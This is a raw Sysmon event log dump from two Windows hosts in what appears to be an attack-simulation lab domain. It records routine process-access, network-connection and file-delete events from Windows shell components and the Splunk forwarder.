07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:29.606{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51014-false10.0.1.12-8000- 23542300x80000000000000001048370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:37.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6F01D837678B0C87A599CF89913EA3D,SHA256=958442FE8DCAD9EDF87CA216980772A95616946783864C6F6BFF0615998AF568,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807476Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:36.204{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57256-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807475Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:37.055{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8B55FD09332DF30D991931732C038F9,SHA256=EFDCD46DBFFC9A3D766FDDF600BBFDDE71D13C24B7C5A9552B1D42F8C2812467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:38.597{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D81E3151D2C24BBC849E62C9E091DF5,SHA256=5334F987E95024835B8FADD4E6B771A16245E3D6304B2855928740B636F662C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807477Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:38.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6099419A32773A07A1748D02957DAD26,SHA256=8A41FDFD10FA335B9B0BF7683A89FA480321AAA3377F4188789F84A5E16C31DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:38.528{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=71D82202B724CDA44EFB88BAF42920E9,SHA256=887A9BAD1FCF2D53D022E53403F1194101151FEED7F2D3925ECD9DF229FFAF0D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048383Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.996{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048382Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.996{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048381Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048380Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-32D3-60E8-770B-00000000CF01}63569824C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-32D3-60E8-770B-00000000CF01}63569824C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.980{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.965{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2726CAAFB0C461532DAC4E3F4A29DEF,SHA256=7A06BCB9F9A2A8CAFAC6197838F6D735DB2C6E020F51229D9BD90CF96EEDAB90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807478Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:39.071{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CF82DC65DD29E68BF2B1A3D037F3881,SHA256=F9B86F7BE1AADA4EE83EF95567F7A6C22F5C1B87E7DC95F30C9ECAF13B49F705,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.596{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:39.596{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:40.612{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5057A6BF449BEA358B3F0ED5E634296,SHA256=87D7D5CE7CE402E58809312BD271476A4FC7BDBFF478426920EBCEE4E6CE97C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807479Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:40.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8829FE11CEC76EA630777DCB5EE84614,SHA256=25430D843D7F6A97E43897116CAA9D6D08508F5F0CD11C13715B486519F6C2A0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048393Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048392Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:41.742{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048391Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 